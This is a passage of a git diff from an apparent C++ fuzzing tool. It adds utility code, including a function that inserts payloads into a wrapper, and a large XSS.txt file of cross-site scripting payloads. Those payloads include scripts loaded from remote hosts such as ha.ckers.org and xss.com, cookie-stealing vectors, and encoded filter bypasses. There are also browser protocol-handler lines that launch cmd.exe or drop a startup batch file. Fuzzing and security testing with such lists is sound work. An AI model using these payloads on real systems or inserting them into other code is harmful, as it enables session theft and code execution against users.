dvi-am html html-am info info-am install install-am \
|
||||
install-binPROGRAMS install-data install-data-am install-dvi \
|
||||
install-dvi-am install-exec install-exec-am install-html \
|
||||
install-html-am install-info install-info-am install-man \
|
||||
install-pdf install-pdf-am install-ps install-ps-am \
|
||||
install-strip installcheck installcheck-am installdirs \
|
||||
maintainer-clean maintainer-clean-generic mostlyclean \
|
||||
mostlyclean-compile mostlyclean-generic pdf pdf-am ps ps-am \
|
||||
tags uninstall uninstall-am uninstall-binPROGRAMS
|
||||
|
||||
# Tell versions [3.59,3.63) of GNU make to not export all variables.
|
||||
# Otherwise a system limit (for SysV at least) may be exceeded.
|
||||
.NOEXPORT:
|
154
src/src/Utils.cpp
Normal file
154
src/src/Utils.cpp
Normal file
@ -0,0 +1,154 @@
|
||||
#include "Utils.h"
|
||||
void Utils::hexdump(void *mem, unsigned int len)
|
||||
{
|
||||
unsigned int i, j;
|
||||
|
||||
for(i = 0; i < len + ((len % HEXDUMP_COLS) ? (HEXDUMP_COLS - len % HEXDUMP_COLS) : 0); i++)
|
||||
{
|
||||
/* print offset */
|
||||
if(i % HEXDUMP_COLS == 0)
|
||||
{
|
||||
fprintf(stdout,"0x%06x: ", i);
|
||||
}
|
||||
|
||||
/* print hex data */
|
||||
if(i < len)
|
||||
{
|
||||
fprintf(stdout,"%02x ", 0xFF & ((char*)mem)[i]);
|
||||
}
|
||||
else /* end of block, just aligning for ASCII dump */
|
||||
{
|
||||
fprintf(stdout," ");
|
||||
}
|
||||
|
||||
/* print ASCII dump */
|
||||
if(i % HEXDUMP_COLS == (HEXDUMP_COLS - 1))
|
||||
{
|
||||
for(j = i - (HEXDUMP_COLS - 1); j <= i; j++)
|
||||
{
|
||||
if(j >= len) /* end of block, not really printing */
|
||||
{
|
||||
putchar(' ');
|
||||
}
|
||||
else if(isprint(((char*)mem)[j])) /* printable char */
|
||||
{
|
||||
putchar(0xFF & ((char*)mem)[j]);
|
||||
}
|
||||
else /* other char */
|
||||
{
|
||||
putchar('.');
|
||||
}
|
||||
}
|
||||
putchar('\n');
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
std::vector<char> Utils::wrapNMAP(string wrapper,std::vector<char> payload)
|
||||
{
|
||||
stringstream ss;
|
||||
string str;
|
||||
std::vector<char> result_vector;
|
||||
|
||||
ss<<wrapper.substr(0,wrapper.find("__FUZZ__"));
|
||||
str=ss.str();
|
||||
|
||||
for(int i=0; i<str.length();i++)
|
||||
result_vector.push_back(str[i]);
|
||||
|
||||
result_vector.insert(result_vector.end(),payload.begin(),payload.end());
|
||||
|
||||
ss.str("");
|
||||
ss<<wrapper.substr(wrapper.find("__FUZZ__")+strlen("__FUZZ__"),wrapper.size());
|
||||
|
||||
str=ss.str();
|
||||
|
||||
for(int i=0; i<str.length();i++)
|
||||
result_vector.push_back(str[i]);
|
||||
|
||||
return result_vector;
|
||||
}
|
||||
|
||||
std::vector<char> Utils::str2vector( std::string& s)
|
||||
{
|
||||
std::vector<char> result_vector;
|
||||
|
||||
for(int i=0; i<s.length();i++)
|
||||
result_vector.push_back(s[i]);
|
||||
|
||||
return result_vector;
|
||||
|
||||
|
||||
}
|
||||
int Utils::isNumeric (const char * s)
|
||||
{
|
||||
if (s == NULL || *s == '\0' || isspace(*s))
|
||||
return 0;
|
||||
char * p;
|
||||
strtod(s, &p);
|
||||
return *p == '\0';
|
||||
}
|
||||
|
||||
|
||||
std::vector<char> Utils::unescape(std::vector<char> & s)
|
||||
{
|
||||
std::vector<char> res;
|
||||
vector<char>::const_iterator it = s.begin();
|
||||
while (it != s.end())
|
||||
{
|
||||
char c = *it++;
|
||||
if (c == '\\' && it != s.end())
|
||||
{
|
||||
switch (*it++) {
|
||||
case 'n': c = '\n'; break;
|
||||
case 'r': c = '\r'; break;
|
||||
case 't': c = '\t'; break;
|
||||
|
||||
// all other escapes
|
||||
default:
|
||||
// invalid escape sequence - skip it. alternatively you can copy it as is, throw an exception...
|
||||
continue;
|
||||
}
|
||||
}
|
||||
res.push_back(c);
|
||||
}
|
||||
|
||||
return res;
|
||||
}
|
||||
|
||||
|
||||
char * Utils::get_substring_value(char* str)
|
||||
{
|
||||
int i=0;
|
||||
int soffset=-1,eoffset=-1;
|
||||
for(i;i<strlen(str);i++)
|
||||
{
|
||||
if(str[i]=='"')
|
||||
{
|
||||
|
||||
if(soffset==-1)
|
||||
soffset=i;
|
||||
else if(eoffset==-1)
|
||||
{
|
||||
eoffset=i;
|
||||
break;
|
||||
}
|
||||
else
|
||||
{
|
||||
fprintf(stdout,"Error in configuration file1");
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if(soffset==-1 || eoffset==-1)
|
||||
{
|
||||
fprintf(stdout,"Error in configuration file2");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
char *substr=(char*)malloc(eoffset-soffset);
|
||||
memset(substr,0,eoffset-soffset);
|
||||
memcpy(substr,str+soffset+1,eoffset-soffset-1);
|
||||
return substr;
|
||||
}
|
40
src/src/Utils.h
Normal file
40
src/src/Utils.h
Normal file
@ -0,0 +1,40 @@
|
||||
#ifndef UTILS_H
|
||||
#define UTILS_H
|
||||
|
||||
|
||||
#include <stdio.h>
|
||||
#include <ctype.h>
|
||||
#include <stdlib.h>
|
||||
#include <openssl/aes.h>
|
||||
#include <openssl/evp.h>
|
||||
#include <string.h>
|
||||
#include <string>
|
||||
#include <sstream>
|
||||
#include <iostream>
|
||||
#include <vector>
|
||||
|
||||
|
||||
#ifndef HEXDUMP_COLS
|
||||
#define HEXDUMP_COLS 16
|
||||
#endif
|
||||
|
||||
|
||||
using namespace std;
|
||||
|
||||
class Utils {
|
||||
|
||||
public:
|
||||
|
||||
static void hexdump(void *mem, unsigned int len);
|
||||
static int isNumeric (const char * s);
|
||||
static char* get_substring_value(char* str);
|
||||
static std::vector<char> wrapNMAP(string wrapper,std::vector<char> payload);
|
||||
static std::vector<char> unescape( std::vector<char>& s);
|
||||
static std::vector<char> str2vector( std::string& s);
|
||||
|
||||
|
||||
};
|
||||
|
||||
|
||||
#endif
|
||||
|
188
src/src/XSS.txt
Normal file
188
src/src/XSS.txt
Normal file
@ -0,0 +1,188 @@
|
||||
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
|
||||
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
|
||||
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
|
||||
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
|
||||
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
|
||||
<<scr\0ipt/src=http://xss.com/xss.js></script
|
||||
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
|
||||
' onmouseover=alert(/Black.Spook/)
|
||||
"><iframe%20src="http://google.com"%%203E
|
||||
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
|
||||
x”</title><img src%3dx onerror%3dalert(1)>
|
||||
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
|
||||
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
|
||||
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
|
||||
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
|
||||
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
|
||||
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
|
||||
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
|
||||
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>
|
||||
<script>alert(document.head.innerHTML.substr(146,20));</script>
|
||||
<script>alert(document.head.childNodes[3].text)</script>
|
||||
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
|
||||
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
|
||||
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>
|
||||
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
|
||||
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>
|
||||
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
|
||||
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
|
||||
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
|
||||
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
|
||||
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
|
||||
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
|
||||
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
|
||||
<script for=document event=onreadystatechange>getElementById('safe123').click()</script>
|
||||
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
|
||||
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>
|
||||
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
|
||||
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
|
||||
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
|
||||
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
|
||||
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
|
||||
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
|
||||
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
|
||||
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
|
||||
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
|
||||
<a href="javascript:\u0061le%72t(1)"><button>
|
||||
<div onmouseover='alert(1)'>DIV</div>
|
||||
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
|
||||
<a href="jAvAsCrIpT:alert(1)">X</a>
|
||||
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
|
||||
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
|
||||
<var onmouseover="prompt(1)">On Mouse Over</var>?
|
||||
<a href=javascript:alert(document.cookie)>Click Here</a>
|
||||
<img src="/" =_=" title="onerror='prompt(1)'">
|
||||
<%<!--'%><script>alert(1);</script -->
|
||||
<script src="data:text/javascript,alert(1)"></script>
|
||||
<iframe/src \/\/onload = prompt(1)
|
||||
<iframe/onreadystatechange=alert(1)
|
||||
<svg/onload=alert(1)
|
||||
<input value=<><iframe/src=javascript:confirm(1)
|
||||
<input type="text" value=``<div/onmouseover='alert(1)'>X</div>
|
||||
http://www.<script>alert(1)</script .com
|
||||
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?
|
||||
<svg><script ?>alert(1)
|
||||
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
||||
<img src=`xx:xx`onerror=alert(1)>
|
||||
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
|
||||
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>?
|
||||
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
||||
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
|
||||
<svg contentScriptType=text/vbs><script>MsgBox+1
|
||||
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
||||
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
|
||||
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
|
||||
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
|
||||
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ????????????
|
||||
<object data=javascript:\u0061le%72t(1)>
|
||||
<script>+-+-1-+-+alert(1)</script>
|
||||
<body/onload=<!-->
alert(1)>
|
||||
<script itworksinallbrowsers>/*<script* */alert(1)</script ?
|
||||
<img src ?itworksonchrome?\/onerror = alert(1)???
|
||||
<svg><script>//
confirm(1);</script </svg>
|
||||
<svg><script onlypossibleinopera:-)> alert(1)
|
||||
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
||||
<script x> alert(1) </script 1=2
|
||||
<div/onmouseover='alert(1)'> style="x:">
|
||||
<--`<img/src=` onerror=alert(1)> --!>
|
||||
<script/src=data:text/javascript,alert(1)></script> ?
|
||||
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?
|
||||
"><img src=x onerror=window.open('https://www.google.com/');>
|
||||
<form><button formaction=javascript:alert(1)>CLICKME
|
||||
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
||||
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
|
||||
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
||||
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|
||||
"><img src=x onerror=prompt(1);>
|
||||
# credit to rsnake
|
||||
<SCRIPT>alert('XSS');</SCRIPT>
|
||||
'';!--"<XSS>=&{()}
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG SRC=javascript:alert("XSS")>
|
||||
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
SRC=
<IMG 6;avascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<SCRIPT>a=/XSS/
|
||||
\";alert('XSS');//
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
<BODY BACKGROUND="javascript:alert('XSS')">
|
||||
<BODY ONLOAD=alert('XSS')>
|
||||
<IMG DYNSRC="javascript:alert('XSS')">
|
||||
<IMG LOWSRC="javascript:alert('XSS')">
|
||||
<BGSOUND SRC="javascript:alert('XSS');">
|
||||
<BR SIZE="&{alert('XSS')}">
|
||||
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
||||
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
||||
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||
<IMG SRC="mocha:[code]">
|
||||
<IMG SRC="livescript:[code]">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
